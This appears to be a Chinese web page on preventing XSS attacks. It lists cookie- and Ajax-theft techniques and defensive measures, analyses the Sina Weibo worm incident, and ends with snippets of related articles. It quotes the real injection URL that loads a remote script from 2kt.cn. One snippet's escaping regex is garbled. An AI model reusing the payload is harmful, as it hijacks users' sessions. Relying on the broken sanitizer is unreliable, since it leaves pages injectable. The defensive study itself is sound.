XSS 防范XSS 攻击的措施

首先看看跨站脚本漏洞的成因,所谓跨站脚本漏洞其实就是Html的注入问题,恶意用户的输入没有经过严格的控制进入了数据库最终显示给来访的用户,导致可以在来访用户的浏览器里以浏览用户的身份执行HTml代码,数据流程如下:

恶意用户的Html输入————>web程序————>进入数据库————>web程序————>用户浏览器

这里给出一些防范XSS 攻击的措施。必须说明的是,对于XSS 攻击,并不像SQL
Injection 那样可以有一劳永逸的解决方案——只需要grep 一下所有的sql 调用。这是一
场长期的斗争,而且往往需要我们采取修改业务流程、产品设计等看似削足适履的手段。
先总结一下常见的攻击手法:
1. 依赖跨站漏洞,需要在被攻击网站的页面种入脚本的手法
1.1. Cookie 盗取,通过javascript 获取被攻击网站种下的cookie,并发送给攻击者。
1.1.1. 从cookie 中提取密码等隐私
1.1.2. 利用cookie 伪造session,发起重放攻击
1.2. Ajex 信息盗取,通过javascript 发起ajex 请求。
1.2.1. 从ajex 结果中获取隐私。
1.2.2. 模拟用户完成多页表单。
2. 不依赖跨站漏洞的手法
搜狐公司研发中心版权所有,仅供技术交流,转载请保留上述文字
2.1. 单向HTTP 动作,通过img.src 等方法发起跨站访问,冒充被攻击者执行特权操作。
但是很难拿到服务器的返回值。
2.2. 双向HTTP 动作,如果服务器产生一段动态的script,那么可以用script.src 的方法
发起跨站访问并拿到服务器的返回值。
防范手法如下:
1. 防堵跨站漏洞,阻止攻击者利用在被攻击网站上发布跨站攻击语句
不可以信任用户提交的任何内容,首先代码里对用户输入的地方和变量都需要仔细
检查长度和对”<”,”>”,”;”,”’”等字符做过滤;其次任何内容写到页面之前都必须加以
encode,避免不小心把html tag 弄出来。
这一个层面做好,至少可以堵住超过一半的XSS 攻击。
2. Cookie 防盗
首先避免直接在cookie 中泄露用户隐私,例如email、密码等等。
其次通过使cookie 和系统ip 绑定来降低cookie 泄露后的危险。这样攻击者得到的
cookie 没有实际价值,不可能拿来重放。
3. 尽量采用POST 而非GET 提交表单
POST 操作不可能绕开javascript 的使用,这会给攻击者增加难度,减少可利用的
跨站漏洞。
4. 严格检查refer
检查http refer 是否来自预料中的url。这可以阻止第2 类攻击手法发起的http 请求,
也能防止大部分第1 类攻击手法,除非正好在特权操作的引用页上种了跨站访问。
5. 将单步流程改为多步,在多步流程中引入效验码
多步流程中每一步都产生一个验证码作为hidden 表单元素嵌在中间页面,下一步操
作时这个验证码被提交到服务器,服务器检查这个验证码是否匹配。首先这为第1 类攻
击者大大增加了麻烦。其次攻击者必须在多步流程中拿到上一步产生的效验码才有可能
发起下一步请求,这在第2 类攻击中是几乎无法做到的。
6. 引入用户交互
简单的一个看图识数可以堵住几乎所有的非预期特权操作。
7. 只在允许anonymous 访问的地方使用动态的javascript。
8. 对于用户提交信息的中的img 等link,检查是否有重定向回本站、不是真的图片等
可疑操作。
9. 内部管理网站的问题
很多时候,内部管理网站往往疏于关注安全问题,只是简单的限制访问来源。这种
网站往往对XSS 攻击毫无抵抗力,需要多加注意。
安全问题需要长期的关注,从来不是一锤子买卖。XSS 攻击相对其他攻击手段更加
隐蔽和多变,和业务流程、代码实现都有关系,不存在什么一劳永逸的解决方案。此外,
面对XSS,往往要牺牲产品的便利性才能保证完全的安全,如何在安全和便利之间平衡
也是一件需要考虑的事情。

XSS攻击有两种方法,

  • 一种就像SQL
    Injection或CMD Injection攻击一样,我把一段脚本注入到服务器上,用户访问方法服务器的某个URL,这个URL就会把远端的js注入进来,这个js有可能自动进 行很多操作。比如这次事件中的帮你发微博,帮你发站内消息等。注入有很多方法,比如:提交表单,更改URL参数,上传图片,设置签名,等等。
  • 另一类则是来来自外部的攻击,主要指的自己构造XSS 跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个跨站网页放在自己的服务器上,然后通过结合其它技术,如
    社会工程学等,欺骗目标服务器的管理员打开。这一类攻击的威胁相对较低,至少ajax 要发起跨站调用是非常困难的(你可能需要hack浏览器)。

这次新浪微博事件是第一种,其利用了微博广场页面
http://weibo.com/pub/star
的一个URL注入了js脚本,其通过http://163.fm/PxZHoxn短链接服务,将链接指向

http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

注意,上面URL链接中的其实就是<script
src=//www.2kt.cn/images/t.js></script>。

攻击者并不一定是2kt.cn的人,因为.cn被国家严格管制(大家不知道coolshell.cn 的备案备了不知有多少次),所以,我个人觉得这个人不会愚蠢到用自己域名来做攻击服务器。

时间: 2024-10-14 17:12:23

XSS 防范XSS 攻击的措施的相关文章

[Javascript]在javascript端防范XSS攻击

在任何被扫描出来有XSS风险的对象,代入类似下列语法,把恶意的字符串去除掉: 这边的情况是a.text会接收到网页上来自使用者的输入的任何文字,怕a.text里面会有恶意的javascript a.text = a.text.replace(/&/g, '&').replace(//g, '>').replace(/"/g, '"').replace(/'/g, ''').replace(///g, '/'); 参考数据: XSS prevention and .

关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

我们常说的网络安全其实应该包括以下三方面的安全: 1.机密性,比如用户的隐私被窃取,帐号被盗,常见的方式是木马. 2.完整性,比如数据的完整,举个例子,康熙传位十四子,被当时四阿哥篡改遗诏:传位于四子,当然这是传说,常见的方式是XSS跨站脚本攻击和csrf跨站请求伪造. 3.可用性,比如我们的网络服务是否可用,常用的攻击方式是dos和ddos,拒绝服务和分布式拒绝服务攻击. 本文主要讲述xss和csrf的攻击,配合实例讲述这2者攻击的危害性以及一些防范的措施,有讲的不对或者不完整的地方欢迎大大们

XSS漏洞自动化攻击工具XSSer

XSS漏洞自动化攻击工具XSSer XSS是Web应用常见的漏洞.利用该漏洞,安全人员在网站注入恶意脚本,控制用户浏览器,并发起其他渗透操作.XSSer是Kali Linux提供的一款自动化XSS攻击框架.该工具可以同时探测多个网址.如果发现XSS漏洞,可以生成报告,并直接进行利用,如建立反向连接.为了提供攻击效率,该工具支持各种规避措施,如判断XSS过滤器.规避特定的防火墙.编码规避.同时,该工具提供丰富的选项,供用户自定义攻击,如指定攻击载荷.设置漏洞利用代码等.

【超精简JS模版库/前端模板库】原理简析 和 XSS防范

使用jsp.php.asp或者后来的struts等等的朋友,不一定知道什么是模版,但一定很清楚这样的开发方式: <div class="m-carousel"> <div class="m-carousel-wrap" id="bannerContainer"> </div> </div> <ul class="catelist onepx" onepxset="

防范xss的正确姿势

xss攻击是web攻击中非常常见的一种攻击手段.如果你还没有听说过xss攻击,可以先了解xss的相关知识和原理,例如: XSS)" target="_blank" rel="nofollow,noindex">https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) . 防范xss攻击的方式也十分简单:转义! 但是转义的时机?是在持久化之前转义呢,还是读数据之后escape呢? 我开始想也没

XSS 和 CSRF 攻击

网站安全的基础有三块: (1) 防范中间人攻击 (TLS mim, man in the middle) 当主机A.和机B通信时,都由主机C来为其"转发",而A.B之间并没有真正意思上的直接通信,他们之间的信息传递同C作为中介来完成,但是A.B却不会意识到,而以为它们之间是在直接通信.这样攻击主机在中间成为了一个转发器,C可以不仅窃听A.B的通信还可以对信息进行篡改再传给对方,C便可以将恶意信息传递给A.B以达到自己的目的. 防范的方法是: 必须对认证过程的传输者认证过程的本身真实性进

xss原理、攻击方式与防御

xss原理: xss叫跨站脚本攻击,是Web程序中常见的漏洞只用于客户端的攻击方式,其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的.如,盗取用户Cookie.破坏页面结构.重定向到其它网站等.所以做网站的时候要明白一个道理:用户的输入是不可信的,所有可输入的地方都要进行数据进行处理才能杜绝xss攻击: xss攻击的二种方式: 1.反射型:一种基于网页DOM结构的攻击,该攻击特点是中招的人是少数人.通常为通

XSS(跨站脚本攻击)的最全总结

从OWASP的官网意译过来,加上自己的理解,算是比较全面的介绍.有兴趣的可私下交流. XSS 跨站脚本攻击 ==================================================================================================================================================== * 什么是XSS ** 综述 Cross-Site Scripting(XSS)是一类注入问题

漫话web渗透 : xss跨站攻击day1

1.1什么是XSS跨站攻击 xss攻击并不是对服务器进行攻击,而是借助网站进行传播,攻击者精心构造的一个URL,欺骗受害者打开从而使恶意脚本在受害者计算机中悄悄运行1.2XSS实例 首先我们看一个简单的xss实例 <html> <head>this is a xss test</head> <body> <script>alert("xss")</script> </body> </html>